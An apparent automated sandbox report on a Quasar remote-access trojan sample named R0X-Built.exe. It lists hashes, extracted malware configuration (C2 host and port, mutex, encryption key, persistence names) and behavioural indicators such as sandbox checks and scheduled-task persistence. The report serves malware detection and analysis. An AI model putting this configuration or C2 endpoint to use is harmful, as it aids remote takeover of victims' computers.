Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
132s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system -
submitted
02/05/2024, 20:58
Behavioral task
behavioral1
Sample
R0X-Built.exe
Resource
win10-20240404-en
windows10-1703-x64
15 signatures
150 seconds
Behavioral task
behavioral2
Sample
R0X-Built.exe
Resource
win10v2004-20240419-en
windows10-2004-x64
23 signatures
150 seconds
General
-
Target
R0X-Built.exe
-
Size
409KB
-
MD5
a0f5aa5764c4f66eee82f857f9f447b6
-
SHA1
3c3a780d020cb3eb3088223443fe813abb95dccd
-
SHA256
43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3
-
SHA512
458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384
-
SSDEEP
6144:RMX2pJAJcC0B61K6qZ1fQ57P/EwXhb4azmosb+lfXdOIFyoOOfTA3pwF:lpyJcC+uK6qZ1G8QJjbfNOSOObA3pwF
Score
10/10
Malware Config
Extracted
Family
quasar
Version
3.1.5
Botnet
Slave
C2
even-lemon.gl.at.ply.gg:33587
Mutex
$Sxr-3vDee7FzoJnhqjuE3n
Attributes
-
encryption_key
KaNwItdY6wlv5nCN4prL
-
install_name
$srr-powershell.exe
-
log_directory
Logs
-
reconnect_delay
1000
-
startup_key
$srr-powershell
-
subdirectory
Windows
Signatures
-
Quasar payload 2 IoCs
resource yara_rule behavioral2/memory/2952-1-0x0000000000940000-0x00000000009AC000-memory.dmp family_quasar behavioral2/files/0x000a000000023ba3-11.dat family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1500 created 612 1500 powershell.EXE 5 -
Downloads MZ/PE file
-
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" WaaSMedicAgent.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Executes dropped EXE 2 IoCs
pid Process 3852 $srr-powershell.exe 3968 install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 20 raw.githubusercontent.com 21 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 12 ip-api.com -
Drops file in System32 directory 14 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1500 set thread context of 3904 1500 powershell.EXE 103 -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 mousocoreworker.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5076 schtasks.exe 2264 SCHTASKS.exe 3120 schtasks.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore mousocoreworker.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb0100000019369be5c95c3c4aa3e907a5f853fc6000000000020000000000106600000001000020000000f44376adee4861e66823e7c31b0b04079d583ba2d4764a726675605f335c7b6a000000000e800000000200002000000091dbf646b7ab72bb290eddad9bfecef23bde09191a57746a74cd0098b716a621b003000064669424c60468df0c07e6ce13378b328b78b8dee3d57b9bc4234311e087b6ce77e924eac4cb264e20b41faa5859349d2a72d8f6be7c0e731965fe7c301b6a0e8ffc3b6edb6784a3e1b71953081cba459d80caad2d23c3496723833da4dc4acaea3ded04855f47e7277a36ebb4495492004447bce1c82d62cb6e5aeab51990ddffa82e9a650770232ea70ece15389cc56d91e7af4cab4149efdf352d4092c80336438cf7f7d71f31be6eb048add64c57b1095bfcf1ec2710ff943eb9ec8f8a0d16aa8e16026f7548ebe33de83db99004a58267d7c189b091beaaf34810e412e2ccb40864872a9790d8e88a08cb7f22c0d2e515dffe8551df96b61edf40d1c378f181ae3302c681ab5fc8c36019050f188b5095f289f749654625a8993030a9898b2dc0c465afdc648c1f5f5ffd1ca27ad63a2b3deb6c8748d9e4c7297d91e4bf9b631d4cc0ce4dc433293157634f3a4e24d0260cbe90d5b22e99d440f2ed475f1567cc72b71e946fcd335edb70e94a583ad26ac1f64b750e40391634678550248b37006ccfe6bc17a69dfb6fc4b2348aeb268a656f0179565e0ccf4052e92dbba7c2fde2991b65109e0f582441fca33e7284b153330e7535b1cc0e026f4360f23800dca8cee4ef1917b1ef28cbf27c38de4c93e2f86b4347b7eb5385ee29fa15ef6a7d8f54f10363df2f5bccacaea3e98126b3d3f5c979860df193077e297593f2f462d8fe795a4afa2570fa0e1b1b75f9e9283007f4f5119475233d84c40137f22d072f75705f017841214d83457e792d7734f362606f81adae0225e3cf1b7cc00610fd6e5839b0ae04a31a72c0303831e00ad69b3f4621a61d069f7caed979bb79afe475dab75f814017b2f045535f765a2d347f051788c809454f4f5d3d96e16eeb962caad65b7d833a5323c2507146b71316ec39b2596ec5e9bfae57f4eef4d62111a203e5d43dd2b2de263499753c7b5669388f0518f21653a129432767450b0b1d299a0cf4904cadd8cae99fb591a0d0b85be0f02ebe7247346a8cde6444cf909d9cff0068deddf6774acd35b7d880a132a0869254e349d371e57c48feeeb88432f6ed97e7eec0c0592db9d924bdf6d02ad5a3eea95c65b46715ed52120cc250acfc41e5e8e46085701219ac5bdc3a6d3a95b5c6c9316f5f1d22fdbea3c1dfdaaabaf85e8a22d3312844fda40098333b68386332aca48dabdd76bcd9ad6314150a94014cbaa880f3e3bcd5a863af53a1c300494bfcb3e7fab23d67aafc1ca877828a9b871b47545c49c0d1f8faac99769e4c5b81f416f6c71e6e1784e521fc7cc86f11ee404568a9ada8758130400000009e75c976a38a45e2b66601c9ac116f0d617f10e12f3bfa9f045113d48151c659a93ab9435dd0231c8775fdd5e7e43735de2348ccc7e244c61ef6b91d82a832dc mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software mousocoreworker.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={4FCB8B93-FE2C-451A-A7AA-480CF4A1B3C4}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" mousocoreworker.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1714683619" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018400E09792876" svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\0018400E09792876 = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb0100000019369be5c95c3c4aa3e907a5f853fc60000000000200000000001066000000010000200000004e9da538afa545e6cbc687d6c5cbd02ad8a2ebaa33f4355c8ae6e8d3cef108dc000000000e80000000020000200000005d4512a3823d59c899b143564e1bacc22e3dd4c661cd65b874f8e8c07a728e0f8000000004fd3b827ff2e50dd0e953f3c0d01ca68777bc7d08609c645b44113de6a6090736fca85c6b09b05ff8deea1e1b321588c2f12169e39af393c5ccfeefa0b6834474e93339d14d7f84aa3222a3e2431a31dff9b1ae632225baae9df777b5f29dd740f9f5b5a71c74f696bf76ec913d884ad28d2df97d4561fbd34f9340108d9a8f4000000083531eefc4f8130b3f0830be3ed794e644947460d6e3a5392bccb56e54a54971107ea3454f57ed687b9affb9f47000dca387f3774aa648245dc85be558b68d91 mousocoreworker.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "0018400E09792876" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft mousocoreworker.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} mousocoreworker.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Thu, 02 May 2024 21:00:20 GMT" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE -
Modifies registry class 64 IoCs
description ioc Process Key deleted \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ec790d02-d551-4a7a RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f6bd7407-8d63-4c2d = "8324" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a175b24e-86bd-44aa = 015fa5c4d39cda01 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a175b24e-86bd-44aa = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\363f95ea-4784-4ec5 = "\\\\?\\Volume{A8F5DE66-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\6c2e94ca6e5e1623f26b6ed0943f5fd3da7d5aa44703003f51decf8a377497ab" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1311bad5-54fb-4f0d = "\\\\?\\Volume{A8F5DE66-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\82b2a6e3845d7882014a9163a68b36151d22befbfbe4ab32fc70398b51a2fbfc" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f6bd7407-8d63-4c2d RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cf6c506f-c2e8-4206 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cf6c506f-c2e8-4206 = "\\\\?\\Volume{A8F5DE66-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\6c2e94ca6e5e1623f26b6ed0943f5fd3da7d5aa44703003f51decf8a377497ab" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4e352fc7-1602-416c = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5effaf81-9b9f-4aa1 = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000041a6aac4d39cda0141a6aac4d39cda0141a6aac4d39cda01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000a25810a82000383539333462646338343734343936643335356566613865363431393839326437303333363433396232373563336538666561336663393562333533306430650000b20009000400efbea25810a8a25810a82e00000000000000000000000000000000000000000000000000bff17300380035003900330034006200640063003800340037003400340039003600640033003500350065006600610038006500360034003100390038003900320064003700300033003300360034003300390062003200370035006300330065003800660065006100330066006300390035006200330035003300300064003000650000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e